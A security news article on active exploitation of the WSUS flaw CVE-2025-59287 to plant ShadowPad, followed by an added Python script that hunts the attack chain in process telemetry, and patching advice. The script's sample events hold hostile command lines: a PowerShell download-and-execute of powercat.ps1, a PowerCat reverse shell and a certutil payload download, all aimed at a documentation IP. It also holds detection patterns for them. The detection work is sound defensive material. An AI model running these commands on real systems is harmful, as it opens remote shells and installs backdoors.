Security researchers warn that a vulnerability in Windows Server Update Services (WSUS) is being actively exploited by threat actors attributed to China to spread malware globally. The vulnerability, tracked as CVE-2025-59287, carries a CVSS score of 9.8 and allows unauthenticated remote code execution on a WSUS server without any user interaction, so any WSUS instance reachable over its service ports (TCP 8530/8531 by default) is exposed.
CVE-2025-59287 Details
The flaw is a deserialization-of-untrusted-data bug: WSUS accepts an encrypted AuthorizationCookie from clients and, after decrypting it, hands the content to the legacy .NET BinaryFormatter, so a crafted cookie lets an attacker execute code with SYSTEM privileges. Microsoft first addressed the vulnerability in its October 2025 Patch Tuesday update; a public proof-of-concept followed, in-the-wild exploitation began shortly afterwards, and Microsoft then shipped an out-of-band update because the initial fix did not fully remediate the issue.
- CVSS score of 9.8 (critical).
- Unauthenticated remote code execution as SYSTEM on any reachable WSUS server.
- Fixed by Microsoft in October 2025 (Patch Tuesday, followed by an out-of-band re-release).
Attack Methods and Targets
AhnLab Security Intelligence Center (ASEC) reported that after exploiting unpatched WSUS servers, attackers use PowerCat, an open-source PowerShell implementation of netcat, to obtain a reverse shell. From that shell they download and install ShadowPad, a modular backdoor long associated with China-nexus espionage groups, using built-in Windows tools such as certutil and curl rather than bringing their own downloader.
ShadowPad is deployed via DLL side-loading: a legitimate, signed executable named ETDCtrlHelper.exe (a component of ELAN touchpad software) is dropped alongside a malicious DLL that it loads at start-up. The primary targets include the government, defense, and telecommunications sectors.
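The chain above (WSUS worker process spawning a shell, PowerCat reverse shell, certutil/curl download, ETDCtrlHelper.exe launched from an unexpected directory) is what a defender wants to see in process-creation telemetry. The following is an added example written for this page, not code from the article, ASEC, or Microsoft. It assumes Sysmon Event ID 1-style records with parent image, image and command line; that WSUS code runs in IIS worker processes (w3wp.exe in the WsusPool application pool) and in WsusService.exe; that the legitimate ETDCtrlHelper.exe lives under Program Files; and the sample events, IP address (198.51.100.7, a documentation range) and paths are constructed for illustration.

```python
"""Hunt the WSUS -> shell -> PowerCat -> LOLBin download -> DLL side-load chain
in process-creation events. Added example; process names, field layout and
sample events are assumptions, not indicators from the report."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Assumption: these processes host WSUS request handling on a WSUS server.
WSUS_HOSTS = {"w3wp.exe", "wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}
SIDELOAD_HOST = "etdctrlhelper.exe"  # legitimate ELAN binary abused for side-loading
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# PowerCat's reverse-shell syntax is "powercat -c <host> -p <port> -e cmd".
POWERCAT_RE = re.compile(r"powercat|-e\s+cmd(\.exe)?\b", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / EDR style, fields assumed)."""
    parent_image: str
    image: str
    command_line: str


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the attack-chain stages one event matches (empty list if benign)."""
    parent, child, cmd = _name(ev.parent_image), _name(ev.image), ev.command_line
    hits: list[str] = []
    # Stage 1: exploitation - a WSUS host process spawning an interactive shell.
    if parent in WSUS_HOSTS and child in SHELLS:
        hits.append("wsus_spawned_shell")
    # Stage 2: PowerCat reverse shell launched from a shell process.
    if child in SHELLS and POWERCAT_RE.search(cmd):
        hits.append("powercat_reverse_shell")
    # Stage 3: living-off-the-land download (certutil/curl given a URL).
    if child in DOWNLOADERS and URL_RE.search(cmd):
        hits.append("lolbin_download")
    # Stage 4: side-loading host executed outside its expected install location.
    if child == SIDELOAD_HOST and "\\program files" not in ev.image.lower():
        hits.append("sideload_host_outside_program_files")
    return hits


def hunt(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched stages, for events that match at least one."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


def chain_stages(events: list[ProcEvent]) -> set[str]:
    """All distinct stages observed across a batch; four of four means the full chain."""
    return {stage for hits in hunt(events).values() for stage in hits}


# Constructed sample telemetry: three malicious steps plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\inetsrv\w3wp.exe", "w3wp.exe -ap WsusPool"),
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -nop -w hidden -c IEX(New-Object Net.WebClient)"
              ".DownloadString('http://198.51.100.7/powercat.ps1'); "
              "powercat -c 198.51.100.7 -p 4444 -e cmd"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -f http://198.51.100.7/ETDCtrlHelper.exe "
              "C:\\ProgramData\\ETDCtrlHelper.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\ProgramData\ETDCtrlHelper.exe", "ETDCtrlHelper.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\ELAN\ETDCtrlHelper.exe", "ETDCtrlHelper.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\curl.exe", "curl --version"),
]

if __name__ == "__main__":
    for idx, stages in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, stages)
    print("stages observed:", sorted(chain_stages(SAMPLE_EVENTS)))
```

Each stage is a weak signal on its own (certutil fetching a URL happens legitimately; an admin can run PowerShell on a WSUS host), so alert on the first stage, a shell spawned by a WSUS host process, and use the later stages to confirm and scope. The side-loading check deliberately keys on location rather than on the binary name alone, because the executable is signed and legitimate.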
Preventive Measures
Exploitation began within days of the public release of proof-of-concept code, which attackers weaponized quickly. Administrators should install the October 2025 update on every WSUS server, making sure the later out-of-band release is applied rather than only the original Patch Tuesday package. Where patching cannot happen immediately, Microsoft's interim mitigations are to disable the WSUS server role or to block inbound TCP 8530 and 8531 at the host firewall; WSUS should in any case not be reachable from the internet. Any server that was exposed and unpatched while the exploit was public should be treated as potentially compromised and checked for the activity described above, since patching does not remove an already-installed backdoor.
This attack underscores how quickly a patched, pre-authentication flaw in an internet-reachable infrastructure service becomes an intrusion vector once a proof of concept is public, especially for systems that serve sensitive sectors worldwide.